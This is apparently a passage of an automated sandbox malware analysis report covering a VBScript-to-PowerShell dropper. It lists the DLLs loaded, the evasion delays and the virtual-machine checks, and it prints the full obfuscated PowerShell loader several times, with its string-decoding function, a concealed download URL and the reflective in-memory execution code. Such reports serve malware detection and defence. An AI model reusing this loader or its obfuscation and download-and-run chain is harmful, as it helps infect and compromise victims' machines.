OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNs
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sxs.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: m.Core.pdbk source: powershell.exe, 00000007.00000002.2864093210.0000000008588000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("powershell " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrou", "0")
              Source: Yara match | File source: 00000007.00000002.2865783140.00000000095EB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000002.2865648783.0000000008A40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000002.2850277699.0000000005F1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.1704308297.000001DE999BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Miljbeskyttelsessektor)$glObal:YnkSoMst = [sYsTem.Text.enCodinG]::AscII.getsTrinG($viRidIgENous)$Global:THanaToLOg=$YNKsOMST.suBsTrING($rAATRet,$afFt)<#Bijouterie Oplftet Aarsindkoms
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Startparameters $Sabbies $ruellia), (Fimbria @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Mieke = [AppDomain]::CurrentDomain.GetAssemblies()$global:Sobr
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Nonpedestrian)), $Overfrelserne).DefineDynamicModule($Jonny, $false).DefineType($Guiled, $Purulence, [System.MulticastDelegate])$brkst
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Miljbeskyttelsessektor)$glObal:YnkSoMst = [sYsTem.Text.enCodinG]::AscII.getsTrinG($viRidIgENous)$Global:THanaToLOg=$YNKsOMST.suBsTrING($rAATRet,$afFt)<#Bijouterie Oplftet Aarsindkoms
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . 
git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNs
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . 
git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNs
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFE7E0000BD pushad ; iretd 4_2_00007FFE7E0000C1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_032BC880 pushfd ; ret 7_2_032BC889
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_079785E8 pushad ; ret 7_2_079785E9
              Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: Initial file | Initial file: Do While Skibsprovianteringens.Status = 0 WScript.Sleep 100
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5378
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4534
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6719
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3033
              Source: C:\Windows\System32\wscript.exe TID: 7512 | Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820 | Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8140 | Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: powershell.exe, 00000004.00000002.1709066822.000001DEA1F03000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll33a
              Source: wscript.exe, 00000001.00000003.1562168681.000001B470CF9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: wscript.exe, 00000001.00000002.1564512829.000001B46EE10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\H
              Source: wscript.exe, 00000001.00000003.1554978924.000001B470CA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1564751206.000001B470CA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1562288428.000001B470CA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1563308658.000001B470CA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1562837364.000001B470CA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1555850954.000001B470CA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1554396735.000001B470CA9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: wscript.exe, 00000001.00000003.1555385159.000001B46EE62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1555506674.000001B46EE62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1564546519.000001B46EE62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1562049493.000001B46EE62000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`
